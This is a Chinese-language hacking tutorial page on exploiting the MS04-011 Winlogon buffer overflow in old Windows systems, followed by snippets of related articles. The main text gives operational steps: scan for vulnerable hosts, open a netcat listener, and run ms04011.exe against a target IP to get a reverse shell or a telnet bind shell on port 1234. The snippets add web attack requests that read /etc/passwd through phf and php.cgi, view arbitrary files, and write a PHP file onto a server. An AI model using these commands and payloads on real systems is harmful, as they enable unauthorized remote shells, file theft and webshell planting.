经典漏洞ms04011的必杀技

受影响系统:
Microsoft Windows XP
Microsoft Windows NT 4.0
Microsoft Windows 2000
描述:

Microsoft Windows Winlogon存在进程一个缓冲区溢出,远程攻击者可以利用这个漏洞可能以进程权限执行任意指令。

由于Winlogon在登录过程中使用的数据值大小没有进行任何检查就插入到分配的缓冲区中,可导致发生缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。

1 用ms04011漏洞扫描器扫出有漏洞的主机扫到有VULNERABLE字样的说明主机有漏洞的可能性非常大

2 扫到后用NC来监听  nc -l -p 监听端口 -----按回车  或 nc -vv -l -p 监听端口

3 方式   ms04011.exe 0 要入侵的IP 监听端口 自己IP
         其中0 表示2000系统 NT5.0          1表示XP系统 NT5.1

或者----------------------------------------------

先ms04011.exe 0 要入侵的IP 
然后直接 telnet 要入侵的IP 1234。

(0)

相关推荐

  • 经典漏洞ms04011的必杀技

    受影响系统: Microsoft Windows XP Microsoft Windows NT 4.0 Microsoft Windows 2000 描述: Microsoft Windows Winlogon存在进程一个缓冲区溢出,远程攻击者可以利用这个漏洞可能以进程权限执行任意指令. 由于Winlogon在登录过程中使用的数据值大小没有进行任何检查就插入到分配的缓冲区中,可导致发生缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令. 1 用ms04011漏洞扫描器扫出有漏洞的主

  • 一些收集到的经典漏洞详解第1/2页

    ☆carbo.dll☆ iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞, 这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符). 攻击方法: 提交这样的http请求 : http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog http会做如下回应: [iCat Ca

  • 详解HTTP协议(很经典)

    引言 HTTP是一个属于应用层的面向对象的协议,由于其简捷.快速的方式,适用于分布式超媒体信息系统.它于1990年提出,经过几年的使用与发展,得到不断地完善和扩展.目前在WWW中使用的是HTTP/1.0的第六版,HTTP/1.1的规范化工作正在进行之中,而且HTTP-NG(Next Generation of HTTP)的建议已经提出. HTTP协议的主要特点可概括如下: 1.支持客户/服务器模式. 2.简单快速:客户向服务器请求服务时,只需传送请求方法和路径.请求方法常用的有GET.HEAD.

  • Oracle也有注入漏洞

    正在看的ORACLE教程是:Oracle也有注入漏洞.近期,MSN.江民等知名网站相继受到了黑客的威胁和攻击,一时间网络上风声鹤唳.本报编辑部接到本文作者(炽天使)的电话,他详细讲述了发现国内最大域名提供商(以下简称"X网")网站漏洞的经过.本报编辑部立即和X网的首席工程师进行了交流,确认了漏洞的真实性,该工程师也及时修补了该漏洞. 发 现 10月18日,笔者手上的项目做完以后,便和网上的朋友天南海北地聊天.听到朋友网站的开张,心里也是非常的羡慕. 什么时候我才能拥有自己的主机和域名-

  • 收藏的经典签名完整版

    1.非常想出家,但总有件事放不下--四级还没过--(兵马俑) 2.终于知道河大宿管老师是信基督教的了,他进我们宿舍的第一句话就是:"Oh,My God!!!"(燕赵) 3.去食堂打了份土豆烧牛肉,结果一不小心掉了块牛肉,于是只吃到了土豆!(日月光华) 4.你以为我真不会讲废话啊!九个字而已--我是带着救生圈来的!!!(我爱南开) 5.以后等咱有钱了就拍个电影叫<房事>,一定火!讲咱们老百姓买房的烦心故事~(水木社区) 6.见到色狼,我也不怕不怕啦,我是女博士,不怕不怕不怕啦

  • CGI漏洞集锦

    一.phf漏洞这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd但是我们还能找到它吗?二.php.cgi 2.0beta10或更早版本的漏洞 可以读nobody权限的所有文件.lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwdphp.cgi

  • 给所有ActionScript初学者的一点建议 经典

    声明:这篇文章我将以连载的形式,不定期的更新,有兴趣的朋友可以随时关注.      本文允许随意转载,但请注明:作者:jinni,出处:经典论坛 (04.26.2004)在论坛当斑竹时间长了,经常会碰到有朋友提出这样的问题:我是菜鸟,请问高手,AS到底该怎么学?我自认算不上高手,但三年的AS编程经验,多少也可以算半个老手(应了蓝色那句话:没有菜鸟和高手之分,只有新手和老手之别),之所以这么说,就是为了先表明立场,在网上混了这些时间,国内的AS顶尖高手我大都还算认识,自知尚无资格与他们比肩,之所以

  • Ofsatr 2.6搜索漏洞的简单分析

    看到网上有类似的工具,但分析的文章却没找到,听小黑说黑客手册上有,可惜偶没有杂志,所以就抓包然后看下代码,大致分析了一下.这个漏洞很巧妙.也很经典 :) GET /search.php?keyword=By%20CN911&cachefile=an85.php%2500&treadinfo=〈?fputs(fop   en(chr(46).chr(47).chr(46).chr(46).chr(47).chr(46).chr(46).chr(47).chr(98).chr(98).chr(

  • WDB论坛存在多个严重漏洞

    =============================================== 仅以此文送给我的好友Bytes, 并祝他和他的女友璐子能够真的相爱一生,白头偕老 =============================================== 前言: 我在和很多网管谈到WEB安全的时候,很多人告诉我WEB安全就是sql injection,"不就是在一个变量后面嵌入你的sql语句么,这个我也会",这是我听到最多的人们对WEB安全的认识,WEB安全难道仅仅是

  • 老兵新传-各种漏洞的利用和一些搜索参数

    各种漏洞的利用和一些搜索参数 说到漏洞,首先应该提到的就是动网的上传漏洞了. "洞网"漏洞拉开了上传漏洞文件的序幕,其他系统的上 传漏洞接踵而来! asp动网论坛漏洞分析 1.这个漏洞不算太严重,用过动网论坛的人都知道,发帖时直接写javascript会被过滤拆分,写http会自动加上链接,漏洞就在此,在这两个地方变通一下,把两个单词的某个字母换成编码形式,然后系统再对应地解码回字母,就达到了避免被过滤的目的.例子说明一下,在发帖时写入[img]javasc然后在"特征字符&

随机推荐